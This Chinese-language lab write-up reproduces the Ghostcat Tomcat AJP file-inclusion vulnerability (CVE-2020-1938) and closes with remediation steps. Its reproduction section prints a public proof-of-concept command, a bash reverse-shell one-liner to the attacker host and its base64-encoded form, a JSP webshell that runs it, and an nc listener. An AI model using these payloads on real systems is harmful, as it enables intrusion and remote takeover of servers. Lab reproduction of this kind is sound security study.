Tomcat 文件读取/文件包含漏洞复现(CVE-2020-1938)

0x01 漏洞概述漏洞简介:

        2020年2月20日,国家信息安全漏洞共享平台(CNVD)发布了关于Apache Tomcat存在文件包含漏洞的安全公告(CNVD-2020-10487,对应CVE-2020-1938)

        CVE-2020-1938是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。

0x02 影响版本:

  • Apache Tomcat 6
  • Apache Tomcat 7 < 7.0.100
  • Apache Tomcat 8 < 8.5.51
  • Apache Tomcat 9 < 9.0.31

0x03 环境准备:

服务器:Centos (IP:192.168.217.142)

Tomcat 版本:Apache Tomcat 8.5.47

攻击机:Kali (IP:192.168.217.141)

POC :CNVD-2020-10487-Tomcat-Ajp-lfi

( https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi )

  • 这里直接使用docker还原之前的 Tomcat 8.5 的镜像,也可以自己使用docker直接拉取对应版本的镜像,在影响版本之间就行

Tomcat 文件读取/文件包含漏洞复现(CVE-2020-1938)_第1张图片

  •  部署好相关的镜像后,直接访问看看是否部署成功

Tomcat 文件读取/文件包含漏洞复现(CVE-2020-1938)_第2张图片

  • 然后就是下载POC,部署在攻击主机上,自此环境准备完成

0x04 漏洞复现:

任意文件读取

  • kali上运行POC读取tomcat的配置文件信息web.xml,成功读到配置信息

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.217.140 -p 8009 -f WEB-INF/web.xml

Tomcat 文件读取/文件包含漏洞复现(CVE-2020-1938)_第3张图片

 利用该漏洞实现RCE(反弹shell)

  • 使用bash反弹shell,端口为攻击机的520
bash -i >& /dev/tcp/192.168.217.141/520 0>&1
  • 因为要在java程序中进行文件包含,还要再使用base64编码上述命令,可能会报错
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xNDEvNTIwIDA+JjE=
  • 最后java执行的反弹shell如下:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xNDEvNTIwIDA+JjE=}|{base64,-d}|{bash,-i}

模拟上传木马

  • 在 linux 服务器中创建一个 shell.txt 文件,模拟上传木马内容如下:

<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xNDEvNTIwIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("
");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("
"); %>
  • 将shell.txt文件拷贝至docker容器的webapps下的ROOT目录下
docker cp shell.txt ghostcat:/usr/local/tomcat/webapps/ROOT/

  • kali使用 nc 监听端口520
nc -lvp 520
  • 更改POC,在脚本最后处将asdf加上.jsp,如下:

Tomcat 文件读取/文件包含漏洞复现(CVE-2020-1938)_第4张图片

  • 直接运行POC,成功反弹shell

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.217.140 -p 8009 -f shell.txt

Tomcat 文件读取/文件包含漏洞复现(CVE-2020-1938)_第5张图片

0x05 修复方法:

  • 官方网站下载新版本进行升级。

  • 直接关闭 AJP Connector,或将其监听地址改为仅监听本机 localhost。

  • 若需使用 Tomcat AJP 协议,可根据使用版本配置协议属性设置认证凭证。

你可能感兴趣的:(漏洞复现,tomcat,java,安全,网络安全,web安全)